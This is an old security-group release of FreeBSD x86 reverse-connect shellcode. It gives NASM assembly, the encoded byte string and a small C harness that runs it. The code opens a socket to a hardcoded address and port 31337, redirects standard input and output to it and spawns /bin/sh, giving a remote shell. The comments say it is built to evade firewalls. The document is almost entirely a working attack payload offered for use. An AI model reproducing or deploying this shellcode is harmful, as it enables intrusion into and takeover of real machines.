; Passive Connection Shellcode
;
; Coded by Scrippie - [email protected] - http://b0f.freebsd.lublin.pl
; Buffer0verfl0w Security
; Why? This evades firewalls...
;
; YES, this is for NASM, I detest AT&T syntaxis - it's gross and unreadable
;
; This is the FreeBSD variant I whipped up
;
; Tnx to dvorak for pointing out that BSD's int 80h assumes a stored EIP
; on the stack before making it and that BSD has a somewhat different
; sockaddr_in structure (containing sin_len)

        BITS 32

; Equates - keeps this stuff a lot more clear

PORT            equ 31337               ; What an eleet port!

_exit           equ 1                   ; See /usr/src/sys/kern/syscalls.c
execve          equ 59                  ; See /usr/src/sys/kern/syscalls.c
dup2            equ 90                  ; See /usr/src/sys/kern/syscalls.c
socket          equ 97                  ; See /usr/src/sys/kern/syscalls.c
connect         equ 98                  ; See /usr/src/sys/kern/syscalls.c

IPPROTO_TCP     equ 6                   ; See netinet/in.h
PF_INET         equ 2                   ; See sys/socket.h
SOCK_STREAM     equ 1                   ; See sys/socket.h

sockaddr_in_off equ 0
shell_off       equ 8
shell_ptr_off   equ 16

        jmp short EndCode

Start:
        pop esi                         ; Get offset data in esi

        xor eax, eax
        xor ebx, ebx

        mov bl, IPPROTO_TCP             ; Push IPPROTO_TCP
        push ebx
        mov bl, SOCK_STREAM             ; Push SOCK_STREAM
        push ebx
        mov bl, PF_INET                 ; Push PF_INET
        push ebx
        push ebx                        ; Skipped by int 80h
        mov al, socket                  ; Select socket() syscall

        int 80h                         ; socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
        mov edx, eax                    ; Save the resulting socket descriptor

        mov byte [esi+sockaddr_in_off+1], PF_INET ; sin_family -> PF_INET
        mov word [esi+sockaddr_in_off+2], PORT  ; Set the port number

        mov bl, 16                      ; sizeof(sockaddr_in)
        push ebx

        lea ebx, [esi+sockaddr_in_off]  ; Get offset sockaddr_in into ebx
        push ebx                        ; Push it
        push eax                        ; Still holds sockfd
        push eax                        ; Canary value

        mov al, connect                 ; Select connect() syscall
        int 80h                         ; connect(sockfd, sockaddr_in, 10)

        xor ebx, ebx
        push ebx
        push edx
        mov al, dup2                    ; Select dup2 syscall

        push eax                        ; Ruined
        int 80h

        inc bl
        push ebx
        push edx
        mov al, dup2                    ; Do the same for stdout
        
        push eax
        int 80h

        inc bl
        push ebx
        push edx
        mov al, dup2                    ; And finally for stderr

        push eax
        int 80h

        xor ebx, ebx
        push ebx                        ; *envp == NULL

        lea edi, [esi+shell_off+7]
        xor eax, eax
        xor ecx, ecx
        mov cl, 9
        repe stosb

        lea ebx, [esi+shell_off]        ; Get offset shell into ebx
        mov [esi+shell_ptr_off], ebx    ; Store it at shell_off
        lea ecx, [esi+shell_ptr_off]    ; Get offset shell_off into ecx
        push ecx                        ; argp
        push ebx                        ; command

        push eax                        ; canary
        mov al, execve
        int 80h                         ; Spawn the frikkin' shell

        mov al, _exit                   ; _exit() system call
        int 80h                         ; Do it

EndCode:
        call Start

sockaddr_in     db 'ABCC'               ; A=sin_len - B=sin_family - C=port
                dd 0x100007f            ; IP addr (s_addr) in htonl() form
; 8 bytes not needed ;)

shell           db '/bin/sh' ;,0
;shell_ptr      db 1,2,3,4

------------------------------------------------------------------------------

And here's the shellcode equivalent

char shellcode[]=
"\xeb\x68\x5e\x31\xc0\x31\xdb\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x53\xb0\x61\x
cd\x80\x89\xc2\xc6\x46\x01\x02\x66\xc7\x46\x02\x69\x7a\xb3\x10\x53\x8d\x1e\x53\
x50\x50\xb0\x62\xcd\x80\x31\xdb\x53\x52\xb0\x5a\x50\xcd\x80\xfe\xc3\x53\x52\xb0
\x5a\x50\xcd\x80\xfe\xc3\x53\x52\xb0\x5a\x50\xcd\x80\x31\xdb\x53\x8d\x7e\x0f\x3
1\xc0\x31\xc9\xb1\x09\xf3\xaa\x8d\x5e\x08\x89\x5e\x10\x8d\x4e\x10\x51\x53\x50\x
b0\x3b\xcd\x80\xb0\x01\xcd\x80\xe8\x93\xff\xff\xff\x41\x42\x43\x43\x7f\x00\x00\
x01\x2f\x62\x69\x6e\x2f\x73\x68";				    ^
						             Start of IP addr
void main() {
        int *ret;

        ret = (int *)&ret + 2;
        (*ret) = (int)shellcode;
}